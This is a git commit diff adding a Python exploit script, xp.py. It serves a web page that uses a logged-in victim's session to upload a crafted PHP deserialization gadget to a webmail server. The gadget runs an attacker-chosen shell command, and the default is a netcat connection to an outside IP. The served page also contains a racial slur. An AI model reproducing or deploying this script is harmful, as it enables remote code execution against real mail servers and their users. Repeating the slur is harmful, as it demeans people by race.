Add xp.py
This commit is contained in:
@@ -0,0 +1,87 @@
|
||||
import argparse
|
||||
import base64
|
||||
from flask import Flask, Response
|
||||
print("vantage")
|
||||
WHITE = base64.b64decode("/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYI4Q/RFhHRUYnJCk6OTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD3+gD/2Q==")
|
||||
|
||||
|
||||
def gbuild(command):
|
||||
encoded = base64.b64encode(command.encode()).decode()
|
||||
gpgconf = f'`echo "{encoded}"|base64 -d|/bin/sh`;'
|
||||
gpgconf = gpgconf.replace(" ", "${IFS}")
|
||||
# same pop chain
|
||||
return f'O:17:"Crypt_GPG_Engine":3:{{s:12:"\x00*\x00_process";b:0;s:11:"\x00*\x00_gpgconf";s:{len(gpgconf)}:"{gpgconf}";s:11:"\x00*\x00_homedir";s:0:"";}}'
|
||||
|
||||
|
||||
def pbuild(rc_url, gadget):
|
||||
imgb64 = base64.b64encode(WHITE).decode()
|
||||
gadgetb64 = base64.b64encode(gadget.encode("latin-1")).decode()
|
||||
return f"""
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head><title>hi</title></head>
|
||||
<body>
|
||||
<p>lol nigger</p>
|
||||
<script>
|
||||
async function run() {{
|
||||
const rc = {rc_url!r};
|
||||
const jpeg = Uint8Array.from(atob("{imgb64}"), c => c.charCodeAt(0));
|
||||
const gadgetName = new TextDecoder("latin1").decode(
|
||||
Uint8Array.from(atob("{gadgetb64}"), c => c.charCodeAt(0))
|
||||
) + ".jpg";
|
||||
|
||||
const fd = new FormData();
|
||||
fd.append("_file[]", new Blob([jpeg], {{type:"image/jpeg"}}), gadgetName);
|
||||
|
||||
await fetch(rc + "/?_task=settings&_action=upload&_from=preferences&_uploadid=x", {{
|
||||
method: "POST",
|
||||
mode: "no-cors",
|
||||
credentials: "include",
|
||||
body: fd
|
||||
}});
|
||||
|
||||
await new Promise(r => setTimeout(r, 1000));
|
||||
|
||||
await fetch(rc + "/?_task=mail", {{
|
||||
mode: "no-cors",
|
||||
credentials: "include"
|
||||
}});
|
||||
|
||||
await new Promise(r => setTimeout(r, 500));
|
||||
|
||||
await fetch(rc + "/?_task=mail", {{
|
||||
mode: "no-cors",
|
||||
credentials: "include"
|
||||
}});
|
||||
|
||||
}}
|
||||
run();
|
||||
</script>
|
||||
</body>
|
||||
</html>"""
|
||||
|
||||
@app.route("/")
|
||||
def index():
|
||||
return Response(html, content_type="text/html")
|
||||
|
||||
|
||||
p = argparse.ArgumentParser()
|
||||
p.add_argument("-r", "--maillink", required=True)
|
||||
p.add_argument("-c", "--command", default="nc 1.1.1.1 1234", help="shell cmd")
|
||||
p.add_argument("-p", "--port", type=int, default=8888)
|
||||
p.add_argument("--host", default="0.0.0.0")
|
||||
args = p.parse_args()
|
||||
|
||||
gadget = gbuild(args.command)
|
||||
print(f"+ {args.command} on {args.maillink}")
|
||||
|
||||
html = pbuild(args.maillink.rstrip("/"), gadget)
|
||||
|
||||
app = Flask(__name__)
|
||||
|
||||
|
||||
print("+ serving page")
|
||||
|
||||
|
||||
|
||||
app.run(host=args.host, port=args.port)
|
||||
Reference in New Issue
Block a user